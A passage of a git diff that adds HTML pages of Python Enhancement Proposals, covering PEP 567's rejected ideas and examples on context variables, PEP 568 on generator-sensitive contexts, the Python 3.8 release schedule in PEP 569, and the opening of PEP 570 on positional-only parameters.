+old = cv.get(default=_deleted)
+try:
+    cv.set(blah)
+    # code
+finally:
+    if old is _deleted:
+        cv.unset()
+    else:
+        cv.set(old)
+
+
+
+
+

Having Token.reset() instead of ContextVar.reset()

+

Nathaniel Smith suggested implementing the ContextVar.reset() +method directly on the Token class, so instead of:

+
token = var.set(value)
+# ...
+var.reset(token)
+
+
+

we would write:

+
token = var.set(value)
+# ...
+token.reset()
+
+
+

Having Token.reset() would make it impossible for a user to +attempt to reset a variable with a token object created by another +variable.

+

This proposal was rejected because ContextVar.reset() makes it +clearer to the human reader of the code which variable is +being reset.

+
+
+

Making Context objects picklable

+

Proposed by Antoine Pitrou, this could enable transparent +cross-process use of Context objects, so the +Offloading execution to other threads example would work with +a ProcessPoolExecutor too.

+

Enabling this is problematic because of the following reasons:

+
    +
  1. ContextVar objects do not have __module__ and +__qualname__ attributes, making straightforward pickling +of Context objects impossible. This is solvable by modifying +the API either to auto-detect the module where a context variable +is defined, or to add a new keyword-only “module” parameter +to the ContextVar constructor.
  2. +
  3. Not all context variables refer to picklable objects. Making a +ContextVar picklable must be an opt-in.
  4. +
+

Given the time frame of the Python 3.7 release schedule it was decided +to defer this proposal to Python 3.8.

+
+
+

Making Context a MutableMapping

+

Making the Context class implement the abc.MutableMapping +interface would mean that it is possible to set and unset variables +using Context[var] = value and del Context[var] operations.

+

This proposal was deferred to Python 3.8+ because of the following:

+
    +
  1. If in Python 3.8 it is decided that generators should support +context variables (see PEP 550 and PEP 568), then Context +would be transformed into a chain-map of context variables mappings +(as every generator would have its own mapping). That would make +mutation operations like Context.__delitem__ confusing, as +they would operate only on the topmost mapping of the chain.
  2. +
  3. Having a single way of mutating the context +(ContextVar.set() and ContextVar.reset() methods) makes +the API more straightforward.

    For example, it would be non-obvious why the below code fragment +does not work as expected:

    +
    var = ContextVar('var')
    +
    +ctx = copy_context()
    +ctx[var] = 'value'
    +print(ctx[var])  # Prints 'value'
    +
    +print(var.get())  # Raises a LookupError
    +
    +
    +

    While the following code would work:

    +
    ctx = copy_context()
    +
    +def func():
    +    ctx[var] = 'value'
    +
    +    # Contrary to the previous example, this would work
    +    # because 'func()' is running within 'ctx'.
    +    print(ctx[var])
    +    print(var.get())
    +
    +ctx.run(func)
    +
    +
    +
  4. +
  5. If Context was mutable it would mean that context variables +could be mutated separately (or concurrently) from the code that +runs within the context. That would be similar to obtaining a +reference to a running Python frame object and modifying its +f_locals from another OS thread. Having one single way to +assign values to context variables makes contexts conceptually +simpler and more predictable, while keeping the door open for +future performance optimizations.
  6. +
+
+
+

Having initial values for ContextVars

+

Nathaniel Smith proposed to have a required initial_value +keyword-only argument for the ContextVar constructor.

+

The main argument against this proposal is that for some types +there is simply no sensible “initial value” except None. +E.g. consider a web framework that stores the current HTTP +request object in a context variable. With the current semantics +it is possible to create a context variable without a default value:

+
# Framework:
+current_request: ContextVar[Request] = \
+    ContextVar('current_request')
+
+
+# Later, while handling an HTTP request:
+request: Request = current_request.get()
+
+# Work with the 'request' object:
+return request.method
+
+
+

Note that in the above example there is no need to check if +request is None. It is simply expected that the framework +always sets the current_request variable, or it is a bug (in +which case current_request.get() would raise a LookupError).

+

If, however, we had a required initial value, we would have +to guard against None values explicitly:

+
# Framework:
+current_request: ContextVar[Optional[Request]] = \
+    ContextVar('current_request', initial_value=None)
+
+
+# Later, while handling an HTTP request:
+request: Optional[Request] = current_request.get()
+
+# Check if the current request object was set:
+if request is None:
+    raise RuntimeError
+
+# Work with the 'request' object:
+return request.method
+
+
+

Moreover, we can loosely compare context variables to regular +Python variables and to threading.local() objects. Both +of them raise errors on failed lookups (NameError and +AttributeError respectively).

+
+
+
+

Backwards Compatibility

+

This proposal preserves 100% backwards compatibility.

+

Libraries that use threading.local() to store context-related +values, currently work correctly only for synchronous code. Switching +them to use the proposed API will keep their behavior for synchronous +code unmodified, but will automatically enable support for +asynchronous code.

+
+
+

Examples

+
+

Converting code that uses threading.local()

+

A typical code fragment that uses threading.local() usually +looks like the following:

+
class PrecisionStorage(threading.local):
+    # Subclass threading.local to specify a default value.
+    value = 0.0
+
+precision = PrecisionStorage()
+
+# To set a new precision:
+precision.value = 0.5
+
+# To read the current precision:
+print(precision.value)
+
+
+

Such code can be converted to use the contextvars module:

+
precision = contextvars.ContextVar('precision', default=0.0)
+
+# To set a new precision:
+precision.set(0.5)
+
+# To read the current precision:
+print(precision.get())
+
+
+
+
+

Offloading execution to other threads

+

It is possible to run code in a separate OS thread using a copy +of the current thread context:

+
executor = ThreadPoolExecutor()
+current_context = contextvars.copy_context()
+
+executor.submit(current_context.run, some_function)
+
+
+
+
+
+

Reference Implementation

+

The reference implementation can be found here: [3]. +See also issue 32436 [4].

+
+
+

Acceptance

+

PEP 567 was accepted by Guido on Monday, January 22, 2018 [5]. +The reference implementation was merged on the same day.

+
+
+

References

+ +
+
+

Acknowledgments

+

I thank Guido van Rossum, Nathaniel Smith, Victor Stinner, +Elvis Pranskevichus, Alyssa Coghlan, Antoine Pitrou, INADA Naoki, +Paul Moore, Eric Snow, Greg Ewing, and many others for their feedback, +ideas, edits, criticism, code reviews, and discussions around +this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0567.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0568/index.html new file mode 100644 index 00000000000..b4e71f13186 --- /dev/null +++ b/pep-0568/index.html @@ -0,0 +1,476 @@ PEP 568 – Generator-sensitivity for Context Variables | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 568 – Generator-sensitivity for Context Variables

+
+
Author:
+
Nathaniel J. Smith <njs at pobox.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
04-Jan-2018
+
Python-Version:
+
3.8
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

Context variables provide a generic mechanism for tracking dynamic, +context-local state, similar to thread-local storage but generalized +to work with other kinds of thread-like contexts, such as asyncio +Tasks. PEP 550 proposed a mechanism for context-local state that was +also sensitive to generator context, but this was pretty complicated, +so the BDFL requested it be simplified. The result was PEP 567, which +is targeted for inclusion in 3.7. This PEP then extends PEP 567’s +machinery to add generator context sensitivity.

+

This PEP is starting out in the “deferred” status, because there isn’t +enough time to give it proper consideration before the 3.7 feature +freeze. The only goal right now is to understand what would be +required to add generator context sensitivity in 3.8, so that we can +avoid shipping something in 3.7 that would rule it out by accident. +(Ruling it out on purpose can wait until 3.8 ;-).)

+
+
+

Rationale

+

[Currently the point of this PEP is just to understand how this +would work, with discussion of whether it’s a good idea deferred +until after the 3.7 feature freeze. So rationale is TBD.]

+
+
+

High-level summary

+

Instead of holding a single Context, the threadstate now holds a +ChainMap of Contexts. ContextVar.get and +ContextVar.set are backed by the ChainMap. Generators and +async generators each have an associated Context that they push +onto the ChainMap while they’re running to isolate their +context-local changes from their callers, though this can be +overridden in cases like @contextlib.contextmanager where +“leaking” context changes from the generator into its caller is +desirable.

+
+
+

Specification

+
+

Review of PEP 567

+

Let’s start by reviewing how PEP 567 works, and then in the next +section we’ll describe the differences.

+

In PEP 567, a Context is a Mapping from ContextVar objects +to arbitrary values. In our pseudo-code here we’ll pretend that it +uses a dict for backing storage. (The real implementation uses a +HAMT, which is semantically equivalent to a dict but with +different performance trade-offs.):

+
class Context(collections.abc.Mapping):
+    def __init__(self):
+        self._data = {}
+        self._in_use = False
+
+    def __getitem__(self, key):
+        return self._data[key]
+
+    def __iter__(self):
+        return iter(self._data)
+
+    def __len__(self):
+        return len(self._data)
+
+
+

At any given moment, the threadstate holds a current Context +(initialized to an empty Context when the threadstate is created); +we can use Context.run to temporarily switch the current +Context:

+
# Context.run
+def run(self, fn, *args, **kwargs):
+    if self._in_use:
+        raise RuntimeError("Context already in use")
+    tstate = get_thread_state()
+    old_context = tstate.current_context
+    tstate.current_context = self
+    self._in_use = True
+    try:
+        return fn(*args, **kwargs)
+    finally:
+        tstate.current_context = old_context
+        self._in_use = False
+
+
+

We can fetch a shallow copy of the current Context by calling +copy_context; this is commonly used when spawning a new task, so +that the child task can inherit context from its parent:

+
def copy_context():
+    tstate = get_thread_state()
+    new_context = Context()
+    new_context._data = dict(tstate.current_context)
+    return new_context
+
+
+

In practice, what end users generally work with is ContextVar +objects, which also provide the only way to mutate a Context. They +work with a utility class Token, which can be used to restore a +ContextVar to its previous value:

+
class Token:
+    MISSING = sentinel_value()
+
+    # Note: constructor is private
+    def __init__(self, context, var, old_value):
+        self._context = context
+        self.var = var
+        self.old_value = old_value
+
+    # XX: PEP 567 currently makes this a method on ContextVar, but
+    # I'm going to propose it switch to this API because it's simpler.
+    def reset(self):
+        # XX: should we allow token reuse?
+        # XX: should we allow tokens to be used if the saved
+        # context is no longer active?
+        if self.old_value is self.MISSING:
+            del self._context._data[self.var]
+        else:
+            self._context._data[self.var] = self.old_value
+
+# XX: the handling of defaults here uses the simplified proposal from
+# https://mail.python.org/pipermail/python-dev/2018-January/151596.html
+# This can be updated to whatever we settle on, it was just less
+# typing this way :-)
+class ContextVar:
+    def __init__(self, name, *, default=None):
+        self.name = name
+        self.default = default
+
+    def get(self):
+        context = get_thread_state().current_context
+        return context.get(self, self.default)
+
+    def set(self, new_value):
+        context = get_thread_state().current_context
+        token = Token(context, self, context.get(self, Token.MISSING))
+        context._data[self] = new_value
+        return token
+
+
+
+
+

Changes from PEP 567 to this PEP

+

In general, Context remains the same. However, now instead of +holding a single Context object, the threadstate stores a stack of +them. This stack acts just like a collections.ChainMap, so we’ll +use that in our pseudocode. Context.run then becomes:

+
# Context.run
+def run(self, fn, *args, **kwargs):
+    if self._in_use:
+        raise RuntimeError("Context already in use")
+    tstate = get_thread_state()
+    old_context_stack = tstate.current_context_stack
+    tstate.current_context_stack = ChainMap([self])     # changed
+    self._in_use = True
+    try:
+        return fn(*args, **kwargs)
+    finally:
+        tstate.current_context_stack = old_context_stack
+        self._in_use = False
+
+
+

Aside from some updated variable names (e.g., +tstate.current_context → tstate.current_context_stack), the +only change here is on the marked line, which now wraps the context in +a ChainMap before stashing it in the threadstate.

+

We also add a Context.push method, which is almost exactly like +Context.run, except that it temporarily pushes the Context +onto the existing stack, instead of temporarily replacing the whole +stack:

+
# Context.push
+def push(self, fn, *args, **kwargs):
+    if self._in_use:
+        raise RuntimeError("Context already in use")
+    tstate = get_thread_state()
+    tstate.current_context_stack.maps.insert(0, self)  # different from run
+    self._in_use = True
+    try:
+        return fn(*args, **kwargs)
+    finally:
+        tstate.current_context_stack.maps.pop(0)       # different from run
+        self._in_use = False
+
+
+

In most cases, we don’t expect push to be used directly; instead, +it will be used implicitly by generators. Specifically, every +generator object and async generator object gains a new attribute +.context. When an (async) generator object is created, this +attribute is initialized to an empty Context (self.context = +Context()). This is a mutable attribute; it can be changed by user +code. But trying to set it to anything that isn’t a Context object +or None will raise an error.

+

Whenever we enter a generator via __next__, send, throw, +or close, or enter an async generator by calling one of those +methods on its __anext__, asend, athrow, or aclose +coroutines, then its .context attribute is checked, and if +non-None, is automatically pushed:

+
# GeneratorType.__next__
+def __next__(self):
+    if self.context is not None:
+        return self.context.push(self.__real_next__)
+    else:
+        return self.__real_next__()
+
+
+

While we don’t expect people to use Context.push often, making it +a public API preserves the principle that a generator can always be +rewritten as an explicit iterator class with equivalent semantics.

+

Also, we modify contextlib.(async)contextmanager to always set its +(async) generator objects’ .context attribute to None:

+
# contextlib._GeneratorContextManagerBase.__init__
+def __init__(self, func, args, kwds):
+    self.gen = func(*args, **kwds)
+    self.gen.context = None                  # added
+    ...
+
+
+

This makes sure that code like this continues to work as expected:

+
@contextmanager
+def decimal_precision(prec):
+    with decimal.localcontext() as ctx:
+        ctx.prec = prec
+        yield
+
+with decimal_precision(2):
+    ...
+
+
+

The general idea here is that by default, every generator object gets +its own local context, but if users want to explicitly get some other +behavior then they can do that.

+
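A hypothetical sketch of these semantics (this PEP is deferred, so no released Python implements it; under PEP 567 as shipped in 3.7, the final assertion below would fail, because the generator’s set() call leaks to the caller):

+
import contextvars
+
+var = contextvars.ContextVar('var', default='outer')
+
+def gen():
+    var.set('inner')  # under this PEP: lands in gen's own Context
+    yield
+    assert var.get() == 'inner'
+
+g = gen()
+next(g)
+# Under this PEP, the generator's change stays local to it:
+assert var.get() == 'outer'
+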

Otherwise, things mostly work as before, except that we go through and +swap everything to use the threadstate ChainMap instead of the +threadstate Context. In full detail:

+

The copy_context function now returns a flattened copy of the +“effective” context. (As an optimization, the implementation might +choose to do this flattening lazily, but if so this will be made +invisible to the user.) Compared to our previous implementation above, +the only change here is that tstate.current_context has been +replaced with tstate.current_context_stack:

+
def copy_context() -> Context:
+    tstate = get_thread_state()
+    new_context = Context()
+    new_context._data = dict(tstate.current_context_stack)
+    return new_context
+
+
+

Token is unchanged, and the changes to ContextVar.get are +trivial:

+
# ContextVar.get
+def get(self):
+    context_stack = get_thread_state().current_context_stack
+    return context_stack.get(self, self.default)
+
+
+

ContextVar.set is a little more interesting: instead of going +through the ChainMap machinery like everything else, it always +mutates the top Context in the stack, and – crucially! – sets up +the returned Token to restore its state later. This allows us to +avoid accidentally “promoting” values between different levels in the +stack, as would happen if we did old = var.get(); ...; +var.set(old):

+
# ContextVar.set
+def set(self, new_value):
+    top_context = get_thread_state().current_context_stack.maps[0]
+    token = Token(top_context, self, top_context.get(self, Token.MISSING))
+    top_context._data[self] = new_value
+    return token
+
+
+

And finally, to allow for introspection of the full context stack, we +provide a new function contextvars.get_context_stack:

+
def get_context_stack() -> List[Context]:
+    return list(get_thread_state().current_context_stack.maps)
+
+
+

That’s all.

+
+
+
+

Comparison to PEP 550

+

The main difference from PEP 550 is that it reified what we’re calling +“contexts” and “context stacks” as two different concrete types +(LocalContext and ExecutionContext respectively). This led to +lots of confusion about what the differences were, and which object +should be used in which places. This proposal simplifies things by +only reifying the Context, which is “just a dict”, and makes the +“context stack” an unnamed feature of the interpreter’s runtime state +– though it is still possible to introspect it using +get_context_stack, for debugging and other purposes.

+
+
+

Implementation notes

+

Context will continue to use a HAMT-based mapping structure under +the hood instead of dict, since we expect that calls to +copy_context are much more common than ContextVar.set. In +almost all cases, copy_context will find that there’s only one +Context in the stack (because it’s rare for generators to spawn +new tasks), and can simply re-use it directly; in other cases HAMTs +are cheap to merge and this can be done lazily.

+

Rather than using an actual ChainMap object, we’ll represent the +context stack using some appropriate structure – the most appropriate +options are probably either a bare list with the “top” of the +stack being the end of the list so we can use push/pop, or +else an intrusive linked list (PyThreadState → Context → +Context → …), with the “top” of the stack at the beginning of +the list to allow efficient push/pop.

+

A critical optimization in PEP 567 is the caching of values inside +ContextVar. Switching from a single context to a context stack +makes this a little bit more complicated, but not too much. Currently, +we invalidate the cache whenever the threadstate’s current Context +changes (on thread switch, and when entering/exiting Context.run). +The simplest approach here would be to invalidate the cache whenever the +stack changes (on thread switch, when entering/exiting +Context.run, and when entering/leaving Context.push). The main +effect of this is that iterating a generator will invalidate the +cache. It seems unlikely that this will cause serious problems, but if +it does, then I think it can be avoided with a cleverer cache key that +recognizes that pushing and then popping a Context returns the +threadstate to its previous state. (Idea: store the cache key for a +particular stack configuration in the topmost Context.)

+

It seems unavoidable in this design that uncached get will be +O(n), where n is the size of the context stack. However, n will +generally be very small – it’s roughly the number of nested +generators, so usually n=1, and it will be extremely rare to see n +greater than, say, 5. At worst, n is bounded by the recursion limit. +In addition, we can expect that in most cases of deep generator +recursion, most of the Contexts in the stack will be empty, and +thus can be skipped extremely quickly during lookup. And for repeated +lookups the caching mechanism will kick in. So it’s probably possible +to construct some extreme case where this causes performance problems, +but ordinary code should be essentially unaffected.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0568.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0569/index.html new file mode 100644 index 00000000000..d5eca141160 --- /dev/null +++ b/pep-0569/index.html @@ -0,0 +1,266 @@ PEP 569 – Python 3.8 Release Schedule | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 569 – Python 3.8 Release Schedule

+
+
Author:
+
Łukasz Langa <lukasz at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
27-Jan-2018
+
Python-Version:
+
3.8
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 3.8. The schedule primarily concerns itself with PEP-sized +items.

+
+
+

Release Manager and Crew

+
    +
  • 3.8 Release Manager: Łukasz Langa
  • +
  • Windows installers: Steve Dower
  • +
  • Mac installers: Ned Deily
  • +
  • Documentation: Julien Palard
  • +
+
+
+

3.8 Lifespan

+

3.8 will receive bugfix updates approximately every 2 months for +approximately 18 months. Some time after the release of 3.9.0 final, +the ninth and final 3.8 bugfix update was released. After that, +security updates (source only) were released for 5 years until the +release of Python 3.13.0 final.

+

As of 2024-10-07, 3.8 has reached the +end-of-life phase +of its release cycle. 3.8.20 was the final security release. +The codebase for 3.8 is now frozen and no further updates will be +provided nor issues of any kind will be accepted on the bug tracker.

+
+
+

Release Schedule

+
+

3.8.0 schedule

+
    +
  • 3.8 development begins: Monday, 2018-01-29
  • +
  • 3.8.0 alpha 1: Sunday, 2019-02-03
  • +
  • 3.8.0 alpha 2: Monday, 2019-02-25
  • +
  • 3.8.0 alpha 3: Monday, 2019-03-25
  • +
  • 3.8.0 alpha 4: Monday, 2019-05-06
  • +
  • 3.8.0 beta 1: Tuesday, 2019-06-04 +(No new features beyond this point.)
  • +
  • 3.8.0 beta 2: Thursday, 2019-07-04
  • +
  • 3.8.0 beta 3: Monday, 2019-07-29
  • +
  • 3.8.0 beta 4: Friday, 2019-08-30
  • +
  • 3.8.0 candidate 1: Tuesday, 2019-10-01
  • +
  • 3.8.0 final: Monday, 2019-10-14
  • +
+
+
+

Bugfix releases

+
    +
  • 3.8.1rc1: Tuesday, 2019-12-10
  • +
  • 3.8.1: Wednesday, 2019-12-18
  • +
  • 3.8.2rc1: Monday, 2020-02-10
  • +
  • 3.8.2rc2: Monday, 2020-02-17
  • +
  • 3.8.2: Monday, 2020-02-24
  • +
  • 3.8.3rc1: Wednesday, 2020-04-29
  • +
  • 3.8.3: Wednesday, 2020-05-13
  • +
  • 3.8.4rc1: Tuesday, 2020-06-30
  • +
  • 3.8.4: Monday, 2020-07-13
  • +
  • 3.8.5: Monday, 2020-07-20 (security hotfix)
  • +
  • 3.8.6rc1: Tuesday, 2020-09-08
  • +
  • 3.8.6: Thursday, 2020-09-24
  • +
  • 3.8.7rc1: Monday, 2020-12-07
  • +
  • 3.8.7: Monday, 2020-12-21
  • +
  • 3.8.8rc1: Tuesday, 2021-02-16
  • +
  • 3.8.8: Friday, 2021-02-19
  • +
  • 3.8.9: Friday, 2021-04-02 (security hotfix)
  • +
  • 3.8.10: Monday, 2021-05-03 (final regular bugfix release with binary +installers)
  • +
+
+
+

Source-only security fix releases

+

Provided irregularly on an “as-needed” basis until October 7th 2024.

+
    +
  • 3.8.11: Monday, 2021-06-28
  • +
  • 3.8.12: Monday, 2021-08-30
  • +
  • 3.8.13: Wednesday, 2022-03-16
  • +
  • 3.8.14: Tuesday, 2022-09-06
  • +
  • 3.8.15: Tuesday, 2022-10-11
  • +
  • 3.8.16: Tuesday, 2022-12-06
  • +
  • 3.8.17: Tuesday, 2023-06-06
  • +
  • 3.8.18: Thursday, 2023-08-24
  • +
  • 3.8.19: Tuesday, 2024-03-19
  • +
  • 3.8.20: Friday, 2024-09-06 (final security release)
  • +
+
+
+
+

Features for 3.8

+

Some of the notable features of Python 3.8 include:

+
    +
  • PEP 570, Positional-only arguments
  • +
  • PEP 572, Assignment Expressions
  • +
  • PEP 574, Pickle protocol 5 with out-of-band data
  • +
  • PEP 578, Runtime audit hooks
  • +
  • PEP 587, Python Initialization Configuration
  • +
  • PEP 590, Vectorcall: a fast calling protocol for CPython
  • +
  • Typing-related: PEP 591 (Final qualifier), PEP 586 (Literal types), +and PEP 589 (TypedDict)
  • +
  • Parallel filesystem cache for compiled bytecode
  • +
  • Debug builds share the same ABI as release builds
  • +
  • f-strings support a handy = specifier for debugging
  • +
  • continue is now legal in finally: blocks
  • +
  • on Windows, the default asyncio event loop is now +ProactorEventLoop
  • +
  • on macOS, the spawn start method is now used by default in +multiprocessing
  • +
  • multiprocessing can now use shared memory segments to avoid +pickling costs between processes
  • +
  • typed_ast is merged back to CPython
  • +
  • LOAD_GLOBAL is now 40% faster
  • +
  • pickle now uses Protocol 4 by default, improving performance
  • +
+

There are many other interesting changes, please consult the +“What’s New” page in the documentation for a full list.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0569.rst

+

Last modified: 2024-10-07 17:56:09 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0570/index.html new file mode 100644 index 00000000000..fdce17ea7bd --- /dev/null +++ b/pep-0570/index.html @@ -0,0 +1,1022 @@ PEP 570 – Python Positional-Only Parameters | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 570 – Python Positional-Only Parameters

+
+
Author:
+
Larry Hastings <larry at hastings.org>, +Pablo Galindo <pablogsal at python.org>, +Mario Corchero <mariocj89 at gmail.com>, +Eric N. Vander Weele <ericvw at gmail.com>
+
BDFL-Delegate:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
20-Jan-2018
+
Python-Version:
+
3.8
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to introduce a new syntax, /, for specifying +positional-only parameters in Python function definitions.

+

Positional-only parameters have no externally-usable name. When a function +accepting positional-only parameters is called, positional arguments are mapped +to these parameters based solely on their order.

+

When designing APIs (application programming interfaces), library +authors try to ensure correct and intended usage of an API. Without the ability to +specify which parameters are positional-only, library authors must be careful +when choosing appropriate parameter names. This care must be taken +even for required parameters or when the parameters +have no external semantic meaning for callers of the API.

+

In this PEP, we discuss:

+
    +
  • Python’s history and current semantics for positional-only parameters
  • +
  • the problems encountered by not having them
  • +
  • how these problems are handled without language-intrinsic support for +positional-only parameters
  • +
  • the benefits of having positional-only parameters
  • +
+

Within context of the motivation, we then:

+
    +
  • discuss why positional-only parameters should be a feature intrinsic to the +language
  • +
  • propose the syntax for marking positional-only parameters
  • +
  • present how to teach this new feature
  • +
  • note rejected ideas in further detail
  • +
+
+
+

Motivation

+
+

History of Positional-Only Parameter Semantics in Python

+

Python originally supported positional-only parameters. Early versions of the +language lacked the ability to call functions with arguments bound to parameters +by name. Around Python 1.0, parameter semantics changed to be +positional-or-keyword. Since then, users have been able to provide arguments +to a function either positionally or by the keyword name specified in the +function’s definition.

+

In current versions of Python, many CPython “builtin” and standard library +functions only accept positional-only parameters. The resulting semantics can be +easily observed by calling one of these functions using keyword arguments:

+
>>> help(pow)
+...
+pow(x, y, z=None, /)
+...
+
+>>> pow(x=5, y=3)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: pow() takes no keyword arguments
+
+
+

pow() expresses that its parameters are positional-only via the +/ marker. However, this is only a documentation convention; Python +developers cannot use this syntax in code.

+

There are functions with other interesting semantics:

+
    +
  • range(), an overloaded function, accepts an optional parameter to the +left of its required parameter. [4]
  • +
  • dict(), whose mapping/iterator parameter is optional and semantically +must be positional-only. Any externally visible name for this parameter +would occlude that name going into the **kwarg keyword variadic parameter +dict. [3]
  • +
+

One can emulate these semantics in Python code by accepting +(*args, **kwargs) and parsing the arguments manually. However, this results +in a disconnect between the function definition and what the function +contractually accepts. The function definition does not match the logic of the +argument handling.

+

Additionally, the / syntax is used beyond CPython for specifying similar semantics (i.e., [1] [2]), thus indicating that these scenarios are not exclusive to CPython and the standard library.

+
+
+

Problems Without Positional-Only Parameters

+

Without positional-only parameters, there are challenges for library authors +and users of APIs. The following subsections outline the problems +encountered by each entity.

+
+

Challenges for Library Authors

+

With positional-or-keyword parameters, the mix of calling conventions is not always desirable. Authors may want to restrict usage of an API by disallowing calling the API with keyword arguments, which exposes the name of the parameter when it is part of the public API. This approach is especially useful for required function parameters that already have semantic meaning (e.g., namedtuple(typename, field_names, …)) or when the parameter name has no true external meaning (e.g., arg1, arg2, …, etc. for min()). If a caller of an API starts using a keyword argument, the library author cannot rename the parameter because it would be a breaking change.

+

Positional-only parameters can be emulated by extracting arguments from +*args one by one. However, this approach is error-prone and is not +synonymous with the function definition, as previously mentioned. The usage of +the function is ambiguous and forces users to look at help(), the +associated auto-generated documentation, or source code to understand what +parameters the function contractually accepts.
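For illustration, a minimal sketch of this emulation (the function divmod_like and its error message are hypothetical):

def divmod_like(*args):
    # Emulate two positional-only parameters by unpacking *args manually.
    # The definition no longer reveals that exactly two arguments are expected.
    if len(args) != 2:
        raise TypeError(f"divmod_like() expected 2 positional arguments, got {len(args)}")
    x, y = args
    return x // y, x % y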

+
+
+

Challenges for Users of an API

+

Users may be surprised when first encountering positional-only notation. This +is expected given that it has only recently been documented +[13] and it is not possible to use in Python code. For +these reasons, this notation is currently an outlier that appears only in +CPython APIs developed in C. Documenting the notation and making it possible +to use it in Python code would eliminate this disconnect.

+

Furthermore, the current documentation for positional-only parameters is inconsistent:

+
    +
  • Some functions denote optional groups of positional-only parameters by +enclosing them in nested square brackets. [5]
  • +
  • Some functions denote optional groups of positional-only parameters by +presenting multiple prototypes with varying numbers of parameters. +[6]
  • +
  • Some functions use both of the above approaches. [4] [7]
  • +
+

The current documentation also does not indicate whether a function accepts positional-only parameters: open() accepts keyword arguments, but ord() does not, and there is no way of telling that just by reading the existing documentation.

+
+
+
+

Benefits of Positional-Only Parameters

+

Positional-only parameters give more control to library authors to better +express the intended usage of an API and allows the API to evolve in a safe, +backward-compatible way. Additionally, it makes the Python language more +consistent with existing documentation and the behavior of various +“builtin” and standard library functions.

+
+

Empowering Library Authors

+

Library authors would have the flexibility to change the name of +positional-only parameters without breaking callers. This flexibility reduces the +cognitive burden for choosing an appropriate public-facing name for required +parameters or parameters that have no true external semantic meaning.

+

Positional-only parameters are useful in several situations such as:

+
    +
  • when a function accepts any keyword argument but also can accept a positional one
  • +
  • when a parameter has no external semantic meaning
  • +
  • when an API’s parameters are required and unambiguous
  • +
+

A key scenario is when a function accepts any keyword argument but can also accept a positional one. Prominent examples are Formatter.format and dict.update. For instance, dict.update accepts a dictionary (positionally), an iterable of key/value pairs (positionally), or multiple keyword arguments. In this scenario, if the dictionary parameter were not positional-only, the user could not use the name that the function definition uses for the parameter or, conversely, the function could not easily distinguish whether the argument received is the dictionary/iterable or a keyword argument for updating a key/value pair.
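For instance, a short interactive sketch of this behavior with dict.update (the key names are arbitrary):

>>> d = {}
>>> d.update({'n': 1}, m=2)   # a mapping passed positionally, plus a keyword
>>> d.update(n=3)             # here 'n' is just another key to store
>>> d
{'n': 3, 'm': 2}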

+

Another scenario where positional-only parameters are useful is when the +parameter name has no true external semantic meaning. For example, let’s say +we want to create a function that converts from one type to another:

+
def as_my_type(x):
+    ...
+
+
+

The name of the parameter provides no intrinsic value and forces the API author +to maintain its name forever since callers might pass x as a keyword +argument.
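With a positional-only parameter, the author could later rename it without breaking callers; a sketch (the names are illustrative):

def as_my_type(x, /):            # callers can only write as_my_type(value)
    ...

def as_my_type(input_value, /):  # a later rename is no longer a breaking change
    ...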

+

Additionally, positional-only parameters are useful when an API’s parameters are required and unambiguous with respect to the function. For example:

+
def add_to_queue(item: QueueItem):
+    ...
+
+
+

The name of the function makes clear the argument expected. A keyword +argument provides minimal benefit and also limits the future evolution of the +API. Say at a later time we want this function to be able to take multiple +items, while preserving backwards compatibility:

+
def add_to_queue(items: Union[QueueItem, List[QueueItem]]):
+    ...
+
+
+

or to take them by using argument lists:

+
def add_to_queue(*items: QueueItem):
+    ...
+
+
+

the author would be forced to always keep the original parameter name to avoid +potentially breaking callers.

+

By being able to specify positional-only parameters, an author can change the +name of the parameters freely or even change them to *args, as seen in the +previous example. There are multiple function definitions in the standard +library which fall into this category. For example, the required parameter to +collections.defaultdict (called default_factory in its documentation) can +only be passed positionally. One special case of this situation is the self +parameter for class methods: it is undesirable that a caller can bind by +keyword to the name self when calling the method from the class:

+
io.FileIO.write(self=f, b=b"data")
+
+
+

Indeed, function definitions from the standard library implemented in C usually +take self as a positional-only parameter:

+
>>> help(io.FileIO.write)
+Help on method_descriptor:
+
+write(self, b, /)
+    Write buffer b to file, return number of bytes written.
+
+
+
+
+

Improving Language Consistency

+

The Python language would be more consistent with positional-only +parameters. If the concept is a normal feature of Python rather than a feature +exclusive to extension modules, it would reduce confusion for users +encountering functions with positional-only parameters. Some major +third-party packages are already using the / notation in their function +definitions [1] [2].

+

Bridging the gap found between “builtin” functions which +specify positional-only parameters and pure Python implementations that lack +the positional syntax would improve consistency. The / syntax is already exposed +in the existing documentation such as when builtins and interfaces are generated +by the argument clinic.

+

Another essential aspect to consider is PEP 399, which mandates that pure Python versions of modules in the standard library must have the same interface and semantics as the accelerator modules implemented in C. For example, if collections.defaultdict were to have a pure Python implementation, it would need to make use of positional-only parameters to match the interface of its C counterpart.
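A hedged sketch of what such a pure Python counterpart might look like under this PEP (simplified for illustration; not the actual standard library code):

class defaultdict(dict):
    def __init__(self, default_factory=None, /, *args, **kwargs):
        # default_factory is positional-only, matching the C version, so
        # 'default_factory' can still be used as an ordinary keyword key.
        super().__init__(*args, **kwargs)
        self.default_factory = default_factory

    def __missing__(self, key):
        # dict.__getitem__ calls __missing__ for absent keys in subclasses.
        if self.default_factory is None:
            raise KeyError(key)
        self[key] = value = self.default_factory()
        return value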

+
+
+
+
+

Rationale

+

We propose to introduce positional-only parameters as a new syntax to the +Python language.

+

